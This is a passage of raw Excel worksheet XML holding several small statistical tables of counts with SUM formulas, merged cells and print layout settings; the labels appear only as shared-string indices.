        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C17" s="114">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="D17" s="114">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="E17" s="113">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="F17" s="23"/>
      <c r="G17" s="23"/>
      <c r="H17" s="113">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="I17" s="23"/>
      <c r="J17" s="23"/>
      <c r="K17" s="23"/>
      <c r="L17" s="23"/>
      <c r="M17" s="82">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
    </row>
  </sheetData>
  <sheetProtection/>
  <mergeCells count="10">
    <mergeCell ref="A1:E1"/>
    <mergeCell ref="M4:M5"/>
    <mergeCell ref="B3:J3"/>
    <mergeCell ref="A3:A5"/>
    <mergeCell ref="B4:D4"/>
    <mergeCell ref="E4:G4"/>
    <mergeCell ref="H4:J4"/>
    <mergeCell ref="K3:M3"/>
    <mergeCell ref="K4:K5"/>
    <mergeCell ref="L4:L5"/>
  </mergeCells>
  <printOptions horizontalCentered="1" verticalCentered="1"/>
  <pageMargins left="0.9448818897637796" right="0.7480314960629921" top="0.5118110236220472" bottom="0.5511811023622047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pane ySplit="5" topLeftCell="A6" activePane="bottomLeft" state="frozen"/>
      <selection pane="topLeft" activeCell="B28" sqref="B28:B29"/>
      <selection pane="bottomLeft" activeCell="B5" sqref="B5"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.00390625" defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="1" width="6.375" style="0" customWidth="1"/>
    <col min="2" max="2" width="7.625" style="0" customWidth="1"/>
    <col min="3" max="3" width="6.50390625" style="0" customWidth="1"/>
    <col min="4" max="4" width="6.25390625" style="0" customWidth="1"/>
    <col min="5" max="6" width="6.50390625" style="0" customWidth="1"/>
    <col min="7" max="7" width="6.375" style="0" customWidth="1"/>
    <col min="8" max="8" width="6.50390625" style="0" customWidth="1"/>
    <col min="9" max="9" width="6.00390625" style="0" customWidth="1"/>
    <col min="10" max="10" width="8.00390625" style="0" customWidth="1"/>
    <col min="11" max="11" width="7.25390625" style="0" customWidth="1"/>
    <col min="12" max="12" width="6.75390625" style="0" customWidth="1"/>
    <col min="13" max="14" width="6.75390625" style="0" bestFit="1" customWidth="1"/>
    <col min="15" max="16" width="6.25390625" style="0" bestFit="1" customWidth="1"/>
    <col min="17" max="17" width="6.125" style="0" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:17" ht="14.25">
      <c r="A1" s="135" t="s">
        <v>404</v>
      </c>
      <c r="B1" s="78"/>
      <c r="C1" s="78"/>
      <c r="D1" s="78"/>
      <c r="E1" s="78"/>
      <c r="F1" s="78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8" t="s">
        <v>329</v>
      </c>
      <c r="P2" s="158"/>
      <c r="Q2" s="158"/>
    </row>
    <row r="3" spans="1:17" ht="19.5" customHeight="1">
      <c r="A3" s="182" t="s">
        <v>177</v>
      </c>
      <c r="B3" s="168" t="s">
        <v>15</v>
      </c>
      <c r="C3" s="168"/>
      <c r="D3" s="168"/>
      <c r="E3" s="168"/>
      <c r="F3" s="168"/>
      <c r="G3" s="168"/>
      <c r="H3" s="168"/>
      <c r="I3" s="168"/>
      <c r="J3" s="168" t="s">
        <v>16</v>
      </c>
      <c r="K3" s="168"/>
      <c r="L3" s="168"/>
      <c r="M3" s="168"/>
      <c r="N3" s="168"/>
      <c r="O3" s="168"/>
      <c r="P3" s="168"/>
      <c r="Q3" s="168"/>
    </row>
    <row r="4" spans="1:17" ht="24" customHeight="1">
      <c r="A4" s="182"/>
      <c r="B4" s="50" t="s">
        <v>10</v>
      </c>
      <c r="C4" s="51" t="s">
        <v>246</v>
      </c>
      <c r="D4" s="51" t="s">
        <v>247</v>
      </c>
      <c r="E4" s="51" t="s">
        <v>248</v>
      </c>
      <c r="F4" s="60" t="s">
        <v>249</v>
      </c>
      <c r="G4" s="60" t="s">
        <v>250</v>
      </c>
      <c r="H4" s="60" t="s">
        <v>251</v>
      </c>
      <c r="I4" s="60" t="s">
        <v>252</v>
      </c>
      <c r="J4" s="50" t="s">
        <v>10</v>
      </c>
      <c r="K4" s="51" t="s">
        <v>246</v>
      </c>
      <c r="L4" s="51" t="s">
        <v>247</v>
      </c>
      <c r="M4" s="51" t="s">
        <v>248</v>
      </c>
      <c r="N4" s="60" t="s">
        <v>249</v>
      </c>
      <c r="O4" s="60" t="s">
        <v>250</v>
      </c>
      <c r="P4" s="60" t="s">
        <v>251</v>
      </c>
      <c r="Q4" s="60" t="s">
        <v>252</v>
      </c>
    </row>
    <row r="5" spans="1:17" ht="18" customHeight="1">
      <c r="A5" s="56" t="s">
        <v>10</v>
      </c>
      <c r="B5" s="53">
        <f aca="true" t="shared" si="0" ref="B5:Q5">SUM(B6:B16)</f>
        <v>4</v>
      </c>
      <c r="C5" s="53">
        <f t="shared" si="0"/>
        <v>1</v>
      </c>
      <c r="D5" s="53">
        <f t="shared" si="0"/>
        <v>2</v>
      </c>
      <c r="E5" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="F5" s="53">
        <f t="shared" si="0"/>
        <v>1</v>
      </c>
      <c r="G5" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="H5" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="I5" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="J5" s="53">
        <f t="shared" si="0"/>
        <v>128</v>
      </c>
      <c r="K5" s="53">
        <f t="shared" si="0"/>
        <v>5</v>
      </c>
      <c r="L5" s="53">
        <f t="shared" si="0"/>
        <v>43</v>
      </c>
      <c r="M5" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="N5" s="53">
        <f t="shared" si="0"/>
        <v>80</v>
      </c>
      <c r="O5" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="P5" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="Q5" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="6" spans="1:17" ht="18" customHeight="1">
      <c r="A6" s="134" t="s">
        <v>382</v>
      </c>
      <c r="B6" s="82">
        <f>SUM(C6:I6)</f>
        <v>0</v>
      </c>
      <c r="C6" s="23"/>
      <c r="D6" s="23"/>
      <c r="E6" s="23"/>
      <c r="F6" s="23"/>
      <c r="G6" s="23"/>
      <c r="H6" s="23"/>
      <c r="I6" s="23"/>
      <c r="J6" s="82">
        <f>SUM(K6:Q6)</f>
        <v>0</v>
      </c>
      <c r="K6" s="23"/>
      <c r="L6" s="23"/>
      <c r="M6" s="23"/>
      <c r="N6" s="23"/>
      <c r="O6" s="23"/>
      <c r="P6" s="23"/>
      <c r="Q6" s="23"/>
    </row>
    <row r="7" spans="1:17" ht="18" customHeight="1">
      <c r="A7" s="134" t="s">
        <v>383</v>
      </c>
      <c r="B7" s="82">
        <f aca="true" t="shared" si="1" ref="B7:B16">SUM(C7:I7)</f>
        <v>0</v>
      </c>
      <c r="C7" s="23"/>
      <c r="D7" s="23"/>
      <c r="E7" s="23"/>
      <c r="F7" s="23"/>
      <c r="G7" s="23"/>
      <c r="H7" s="23"/>
      <c r="I7" s="23"/>
      <c r="J7" s="82">
        <f aca="true" t="shared" si="2" ref="J7:J15">SUM(K7:Q7)</f>
        <v>0</v>
      </c>
      <c r="K7" s="23"/>
      <c r="L7" s="23"/>
      <c r="M7" s="23"/>
      <c r="N7" s="23"/>
      <c r="O7" s="23"/>
      <c r="P7" s="23"/>
      <c r="Q7" s="23"/>
    </row>
    <row r="8" spans="1:17" ht="18" customHeight="1">
      <c r="A8" s="134" t="s">
        <v>384</v>
      </c>
      <c r="B8" s="82">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C8" s="23"/>
      <c r="D8" s="23"/>
      <c r="E8" s="23"/>
      <c r="F8" s="23"/>
      <c r="G8" s="23"/>
      <c r="H8" s="23"/>
      <c r="I8" s="23"/>
      <c r="J8" s="82">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K8" s="23"/>
      <c r="L8" s="23"/>
      <c r="M8" s="23"/>
      <c r="N8" s="23"/>
      <c r="O8" s="23"/>
      <c r="P8" s="23"/>
      <c r="Q8" s="23"/>
    </row>
    <row r="9" spans="1:17" ht="18" customHeight="1">
      <c r="A9" s="134" t="s">
        <v>385</v>
      </c>
      <c r="B9" s="82">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C9" s="23"/>
      <c r="D9" s="23"/>
      <c r="E9" s="23"/>
      <c r="F9" s="23"/>
      <c r="G9" s="23"/>
      <c r="H9" s="23"/>
      <c r="I9" s="23"/>
      <c r="J9" s="82">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K9" s="23"/>
      <c r="L9" s="23"/>
      <c r="M9" s="23"/>
      <c r="N9" s="23"/>
      <c r="O9" s="23"/>
      <c r="P9" s="23"/>
      <c r="Q9" s="23"/>
    </row>
    <row r="10" spans="1:17" ht="18" customHeight="1">
      <c r="A10" s="134" t="s">
        <v>386</v>
      </c>
      <c r="B10" s="82">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C10" s="23"/>
      <c r="D10" s="23"/>
      <c r="E10" s="23"/>
      <c r="F10" s="23"/>
      <c r="G10" s="23"/>
      <c r="H10" s="23"/>
      <c r="I10" s="23"/>
      <c r="J10" s="82">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K10" s="23"/>
      <c r="L10" s="23"/>
      <c r="M10" s="23"/>
      <c r="N10" s="23"/>
      <c r="O10" s="23"/>
      <c r="P10" s="23"/>
      <c r="Q10" s="23"/>
    </row>
    <row r="11" spans="1:17" ht="18" customHeight="1">
      <c r="A11" s="134" t="s">
        <v>387</v>
      </c>
      <c r="B11" s="82">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C11" s="23"/>
      <c r="D11" s="23"/>
      <c r="E11" s="23"/>
      <c r="F11" s="23"/>
      <c r="G11" s="23"/>
      <c r="H11" s="23"/>
      <c r="I11" s="23"/>
      <c r="J11" s="82">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K11" s="23"/>
      <c r="L11" s="23"/>
      <c r="M11" s="23"/>
      <c r="N11" s="23"/>
      <c r="O11" s="23"/>
      <c r="P11" s="23"/>
      <c r="Q11" s="23"/>
    </row>
    <row r="12" spans="1:17" ht="18" customHeight="1">
      <c r="A12" s="134" t="s">
        <v>388</v>
      </c>
      <c r="B12" s="82">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C12" s="23"/>
      <c r="D12" s="23"/>
      <c r="E12" s="23"/>
      <c r="F12" s="23"/>
      <c r="G12" s="23"/>
      <c r="H12" s="23"/>
      <c r="I12" s="23"/>
      <c r="J12" s="82">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K12" s="23"/>
      <c r="L12" s="23"/>
      <c r="M12" s="23"/>
      <c r="N12" s="23"/>
      <c r="O12" s="23"/>
      <c r="P12" s="23"/>
      <c r="Q12" s="23"/>
    </row>
    <row r="13" spans="1:17" ht="18" customHeight="1">
      <c r="A13" s="134" t="s">
        <v>389</v>
      </c>
      <c r="B13" s="82">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="C13" s="23">
        <v>1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82">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="K13" s="23">
        <v>5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</row>
    <row r="14" spans="1:17" ht="18" customHeight="1">
      <c r="A14" s="134" t="s">
        <v>390</v>
      </c>
      <c r="B14" s="82">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C14" s="23"/>
      <c r="D14" s="23"/>
      <c r="E14" s="23"/>
      <c r="F14" s="23"/>
      <c r="G14" s="23"/>
      <c r="H14" s="23"/>
      <c r="I14" s="23"/>
      <c r="J14" s="82">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K14" s="23"/>
      <c r="L14" s="23"/>
      <c r="M14" s="23"/>
      <c r="N14" s="23"/>
      <c r="O14" s="23"/>
      <c r="P14" s="23"/>
      <c r="Q14" s="23"/>
    </row>
    <row r="15" spans="1:17" ht="18" customHeight="1">
      <c r="A15" s="134" t="s">
        <v>391</v>
      </c>
      <c r="B15" s="82">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C15" s="23"/>
      <c r="D15" s="23"/>
      <c r="E15" s="23"/>
      <c r="F15" s="23"/>
      <c r="G15" s="23"/>
      <c r="H15" s="23"/>
      <c r="I15" s="23"/>
      <c r="J15" s="82">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K15" s="23"/>
      <c r="L15" s="23"/>
      <c r="M15" s="23"/>
      <c r="N15" s="23"/>
      <c r="O15" s="23"/>
      <c r="P15" s="23"/>
      <c r="Q15" s="23"/>
    </row>
    <row r="16" spans="1:17" ht="18" customHeight="1">
      <c r="A16" s="134" t="s">
        <v>392</v>
      </c>
      <c r="B16" s="82">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="C16" s="23">
        <v>0</v>
      </c>
      <c r="D16" s="23">
        <v>2</v>
      </c>
      <c r="E16" s="23">
        <v>0</v>
      </c>
      <c r="F16" s="23">
        <v>1</v>
      </c>
      <c r="G16" s="23">
        <v>0</v>
      </c>
      <c r="H16" s="23">
        <v>0</v>
      </c>
      <c r="I16" s="23">
        <v>0</v>
      </c>
      <c r="J16" s="82">
        <v>123</v>
      </c>
      <c r="K16" s="23">
        <v>0</v>
      </c>
      <c r="L16" s="23">
        <v>43</v>
      </c>
      <c r="M16" s="23">
        <v>0</v>
      </c>
      <c r="N16" s="23">
        <v>80</v>
      </c>
      <c r="O16" s="23">
        <v>0</v>
      </c>
      <c r="P16" s="23">
        <v>0</v>
      </c>
      <c r="Q16" s="23">
        <v>0</v>
      </c>
    </row>
    <row r="17" ht="15" customHeight="1"/>
  </sheetData>
  <sheetProtection/>
  <mergeCells count="4">
    <mergeCell ref="A3:A4"/>
    <mergeCell ref="B3:I3"/>
    <mergeCell ref="J3:Q3"/>
    <mergeCell ref="O2:Q2"/>
  </mergeCells>
  <printOptions horizontalCentered="1" verticalCentered="1"/>
  <pageMargins left="1.141732283464567" right="0.7480314960629921" top="0.5511811023622047" bottom="0.5511811023622047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161"/>
  <sheetViews>
    <sheetView zoomScalePageLayoutView="0" workbookViewId="0" topLeftCell="A1">
      <pane ySplit="6" topLeftCell="A7" activePane="bottomLeft" state="frozen"/>
      <selection pane="topLeft" activeCell="B28" sqref="B28:B29"/>
      <selection pane="bottomLeft" activeCell="Q7" sqref="Q7:Q17"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.00390625" defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="1" width="7.125" style="0" customWidth="1"/>
    <col min="2" max="2" width="7.75390625" style="0" customWidth="1"/>
    <col min="3" max="3" width="6.75390625" style="0" customWidth="1"/>
    <col min="4" max="4" width="7.25390625" style="0" customWidth="1"/>
    <col min="5" max="5" width="7.125" style="0" customWidth="1"/>
    <col min="6" max="6" width="7.00390625" style="0" customWidth="1"/>
    <col min="7" max="7" width="6.75390625" style="0" customWidth="1"/>
    <col min="8" max="8" width="8.00390625" style="0" customWidth="1"/>
    <col min="9" max="9" width="6.75390625" style="0" customWidth="1"/>
    <col min="10" max="10" width="7.00390625" style="0" customWidth="1"/>
    <col min="11" max="11" width="7.875" style="0" customWidth="1"/>
    <col min="12" max="12" width="7.50390625" style="0" customWidth="1"/>
    <col min="13" max="13" width="7.75390625" style="0" customWidth="1"/>
    <col min="14" max="14" width="7.00390625" style="0" customWidth="1"/>
    <col min="15" max="16" width="6.125" style="0" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:16" ht="14.25">
      <c r="A1" s="135" t="s">
        <v>405</v>
      </c>
      <c r="B1" s="78"/>
      <c r="C1" s="78"/>
      <c r="D1" s="78"/>
      <c r="E1" s="78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 t="s">
        <v>327</v>
      </c>
      <c r="P2" s="15"/>
    </row>
    <row r="3" spans="1:16" ht="19.5" customHeight="1">
      <c r="A3" s="168" t="s">
        <v>183</v>
      </c>
      <c r="B3" s="168" t="s">
        <v>81</v>
      </c>
      <c r="C3" s="168"/>
      <c r="D3" s="168"/>
      <c r="E3" s="168"/>
      <c r="F3" s="168"/>
      <c r="G3" s="168"/>
      <c r="H3" s="168"/>
      <c r="I3" s="168"/>
      <c r="J3" s="168"/>
      <c r="K3" s="168" t="s">
        <v>82</v>
      </c>
      <c r="L3" s="168"/>
      <c r="M3" s="168"/>
      <c r="N3" s="168"/>
      <c r="O3" s="168"/>
      <c r="P3" s="168"/>
    </row>
    <row r="4" spans="1:16" ht="19.5" customHeight="1">
      <c r="A4" s="168"/>
      <c r="B4" s="168" t="s">
        <v>10</v>
      </c>
      <c r="C4" s="168"/>
      <c r="D4" s="168"/>
      <c r="E4" s="168" t="s">
        <v>253</v>
      </c>
      <c r="F4" s="168"/>
      <c r="G4" s="168"/>
      <c r="H4" s="165" t="s">
        <v>254</v>
      </c>
      <c r="I4" s="166"/>
      <c r="J4" s="167"/>
      <c r="K4" s="168" t="s">
        <v>0</v>
      </c>
      <c r="L4" s="168" t="s">
        <v>255</v>
      </c>
      <c r="M4" s="168" t="s">
        <v>256</v>
      </c>
      <c r="N4" s="168" t="s">
        <v>257</v>
      </c>
      <c r="O4" s="168" t="s">
        <v>258</v>
      </c>
      <c r="P4" s="168" t="s">
        <v>259</v>
      </c>
    </row>
    <row r="5" spans="1:16" ht="19.5" customHeight="1">
      <c r="A5" s="168"/>
      <c r="B5" s="50" t="s">
        <v>10</v>
      </c>
      <c r="C5" s="50" t="s">
        <v>12</v>
      </c>
      <c r="D5" s="50" t="s">
        <v>13</v>
      </c>
      <c r="E5" s="50" t="s">
        <v>10</v>
      </c>
      <c r="F5" s="50" t="s">
        <v>12</v>
      </c>
      <c r="G5" s="50" t="s">
        <v>13</v>
      </c>
      <c r="H5" s="50" t="s">
        <v>10</v>
      </c>
      <c r="I5" s="50" t="s">
        <v>12</v>
      </c>
      <c r="J5" s="50" t="s">
        <v>13</v>
      </c>
      <c r="K5" s="168"/>
      <c r="L5" s="168"/>
      <c r="M5" s="168"/>
      <c r="N5" s="168"/>
      <c r="O5" s="168"/>
      <c r="P5" s="168"/>
    </row>
    <row r="6" spans="1:17" ht="15.75" customHeight="1">
      <c r="A6" s="54" t="s">
        <v>10</v>
      </c>
      <c r="B6" s="53">
        <f aca="true" t="shared" si="0" ref="B6:P6">SUM(B7:B17)</f>
        <v>128</v>
      </c>
      <c r="C6" s="53">
        <f t="shared" si="0"/>
        <v>76</v>
      </c>
      <c r="D6" s="53">
        <f t="shared" si="0"/>
        <v>52</v>
      </c>
      <c r="E6" s="53">
        <f t="shared" si="0"/>
        <v>42</v>
      </c>
      <c r="F6" s="53">
        <f t="shared" si="0"/>
        <v>23</v>
      </c>
      <c r="G6" s="53">
        <f t="shared" si="0"/>
        <v>19</v>
      </c>
      <c r="H6" s="53">
        <f t="shared" si="0"/>
        <v>86</v>
      </c>
      <c r="I6" s="53">
        <f t="shared" si="0"/>
        <v>53</v>
      </c>
      <c r="J6" s="53">
        <f t="shared" si="0"/>
        <v>33</v>
      </c>
      <c r="K6" s="53">
        <f t="shared" si="0"/>
        <v>128</v>
      </c>
      <c r="L6" s="53">
        <f t="shared" si="0"/>
        <v>65</v>
      </c>
      <c r="M6" s="53">
        <f t="shared" si="0"/>
        <v>27</v>
      </c>
      <c r="N6" s="53">
        <f t="shared" si="0"/>
        <v>36</v>
      </c>
      <c r="O6" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="P6" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="Q6" s="19"/>
    </row>
    <row r="7" spans="1:17" ht="15.75" customHeight="1">
      <c r="A7" s="134" t="s">
        <v>382</v>
      </c>
      <c r="B7" s="114">
        <f>SUM(C7:D7)</f>
        <v>0</v>
      </c>
      <c r="C7" s="114">
        <f>SUM(F7,I7)</f>
        <v>0</v>
      </c>
      <c r="D7" s="114">
        <f>SUM(G7,J7)</f>
        <v>0</v>
      </c>
      <c r="E7" s="113">
        <f>SUM(F7:G7)</f>
        <v>0</v>
      </c>
      <c r="F7" s="23"/>
      <c r="G7" s="23"/>
      <c r="H7" s="113">
        <f>SUM(I7:J7)</f>
        <v>0</v>
      </c>
      <c r="I7" s="23"/>
      <c r="J7" s="23"/>
      <c r="K7" s="82">
        <f>SUM(L7:P7)</f>
        <v>0</v>
      </c>
      <c r="L7" s="23"/>
      <c r="M7" s="23"/>
      <c r="N7" s="23"/>
      <c r="O7" s="23"/>
      <c r="P7" s="23"/>
      <c r="Q7" s="136">
        <v>0</v>
      </c>
    </row>
    <row r="8" spans="1:17" ht="15.75" customHeight="1">
      <c r="A8" s="134" t="s">
        <v>383</v>
      </c>
      <c r="B8" s="114">
        <f aca="true" t="shared" si="1" ref="B8:B17">SUM(C8:D8)</f>
        <v>0</v>
      </c>
      <c r="C8" s="114">
        <f aca="true" t="shared" si="2" ref="C8:C17">SUM(F8,I8)</f>
        <v>0</v>
      </c>
      <c r="D8" s="114">
        <f aca="true" t="shared" si="3" ref="D8:D17">SUM(G8,J8)</f>
        <v>0</v>
      </c>
      <c r="E8" s="113">
        <f aca="true" t="shared" si="4" ref="E8:E17">SUM(F8:G8)</f>
        <v>0</v>
      </c>
      <c r="F8" s="23"/>
      <c r="G8" s="23"/>
      <c r="H8" s="113">
        <f aca="true" t="shared" si="5" ref="H8:H16">SUM(I8:J8)</f>
        <v>0</v>
      </c>
      <c r="I8" s="23"/>
      <c r="J8" s="23"/>
      <c r="K8" s="82">
        <f aca="true" t="shared" si="6" ref="K8:K16">SUM(L8:P8)</f>
        <v>0</v>
      </c>
      <c r="L8" s="23"/>
      <c r="M8" s="23"/>
      <c r="N8" s="23"/>
      <c r="O8" s="23"/>
      <c r="P8" s="23"/>
      <c r="Q8" s="136">
        <v>0</v>
      </c>
    </row>
    <row r="9" spans="1:17" ht="15.75" customHeight="1">
      <c r="A9" s="134" t="s">
        <v>384</v>
      </c>
      <c r="B9" s="114">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C9" s="114">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="D9" s="114">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="E9" s="113">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="F9" s="23"/>
      <c r="G9" s="23"/>
      <c r="H9" s="113">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="I9" s="23"/>
      <c r="J9" s="23"/>
      <c r="K9" s="82">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="L9" s="23"/>
      <c r="M9" s="23"/>
      <c r="N9" s="23"/>
      <c r="O9" s="23"/>
      <c r="P9" s="23"/>
      <c r="Q9" s="136">
        <v>0</v>
      </c>
    </row>
    <row r="10" spans="1:17" ht="15.75" customHeight="1">
      <c r="A10" s="134" t="s">
        <v>385</v>
      </c>
      <c r="B10" s="114">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C10" s="114">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="D10" s="114">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="E10" s="113">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="F10" s="23"/>
      <c r="G10" s="23"/>
      <c r="H10" s="113">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="I10" s="23"/>
      <c r="J10" s="23"/>
      <c r="K10" s="82">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="L10" s="23"/>
      <c r="M10" s="23"/>
      <c r="N10" s="23"/>
      <c r="O10" s="23"/>
      <c r="P10" s="23"/>
      <c r="Q10" s="136">
        <v>0</v>
      </c>
    </row>
    <row r="11" spans="1:17" ht="15.75" customHeight="1">
      <c r="A11" s="134" t="s">
        <v>386</v>
      </c>
      <c r="B11" s="114">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C11" s="114">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="D11" s="114">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="E11" s="113">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="F11" s="23"/>
      <c r="G11" s="23"/>
      <c r="H11" s="113">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="I11" s="23"/>
      <c r="J11" s="23"/>
      <c r="K11" s="82">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="L11" s="23"/>
      <c r="M11" s="23"/>
      <c r="N11" s="23"/>
      <c r="O11" s="23"/>
      <c r="P11" s="23"/>
      <c r="Q11" s="136">
        <v>0</v>
      </c>
    </row>
    <row r="12" spans="1:17" ht="15.75" customHeight="1">
      <c r="A12" s="134" t="s">
        <v>387</v>
      </c>
      <c r="B12" s="114">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C12" s="114">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="D12" s="114">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="E12" s="113">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="F12" s="23"/>
      <c r="G12" s="23"/>
      <c r="H12" s="113">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="I12" s="23"/>
      <c r="J12" s="23"/>
      <c r="K12" s="82">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="L12" s="23"/>
      <c r="M12" s="23"/>
      <c r="N12" s="23"/>
      <c r="O12" s="23"/>
      <c r="P12" s="23"/>
      <c r="Q12" s="136">
        <v>0</v>
      </c>
    </row>
    <row r="13" spans="1:17" ht="15.75" customHeight="1">
      <c r="A13" s="134" t="s">
        <v>388</v>
      </c>
      <c r="B13" s="114">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C13" s="114">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="D13" s="114">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="E13" s="113">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="F13" s="23"/>
      <c r="G13" s="23"/>
      <c r="H13" s="113">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="I13" s="23"/>
      <c r="J13" s="23"/>
      <c r="K13" s="82">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="L13" s="23"/>
      <c r="M13" s="23"/>
      <c r="N13" s="23"/>
      <c r="O13" s="23"/>
      <c r="P13" s="23"/>
      <c r="Q13" s="136">
        <v>0</v>
      </c>
    </row>
    <row r="14" spans="1:17" ht="15.75" customHeight="1">
      <c r="A14" s="134" t="s">
        <v>389</v>
      </c>
      <c r="B14" s="114">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="C14" s="114">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="D14" s="114">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E14" s="113">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F14" s="23">
        <v>1</v>
      </c>
      <c r="G14" s="23">
        <v>1</v>
      </c>
      <c r="H14" s="113">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="I14" s="23">
        <v>2</v>
      </c>
      <c r="J14" s="23">
        <v>1</v>
      </c>
      <c r="K14" s="82">
        <f t="shared" si="6"/>
        <v>5</v>
      </c>
      <c r="L14" s="23">
        <v>5</v>
      </c>
      <c r="M14" s="23">
        <v>0</v>
      </c>
      <c r="N14" s="23">
        <v>0</v>
      </c>
      <c r="O14" s="23">
        <v>0</v>
      </c>
      <c r="P14" s="23">
        <v>0</v>
      </c>
      <c r="Q14" s="136">
        <v>5</v>
      </c>
    </row>
    <row r="15" spans="1:17" ht="15.75" customHeight="1">
      <c r="A15" s="134" t="s">
        <v>390</v>
      </c>
      <c r="B15" s="114">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C15" s="114">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="D15" s="114">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="E15" s="113">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="F15" s="23"/>
      <c r="G15" s="23"/>
      <c r="H15" s="113">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="I15" s="23"/>
      <c r="J15" s="23"/>
      <c r="K15" s="82">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="L15" s="23"/>
      <c r="M15" s="23"/>
      <c r="N15" s="23"/>
      <c r="O15" s="23"/>
      <c r="P15" s="23"/>
      <c r="Q15" s="136">
        <v>0</v>
      </c>
    </row>
    <row r="16" spans="1:17" ht="15.75" customHeight="1">
      <c r="A16" s="134" t="s">
        <v>391</v>
      </c>
      <c r="B16" s="114">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C16" s="114">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="D16" s="114">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="E16" s="113">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="F16" s="23"/>
      <c r="G16" s="23"/>
      <c r="H16" s="113">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="I16" s="23"/>
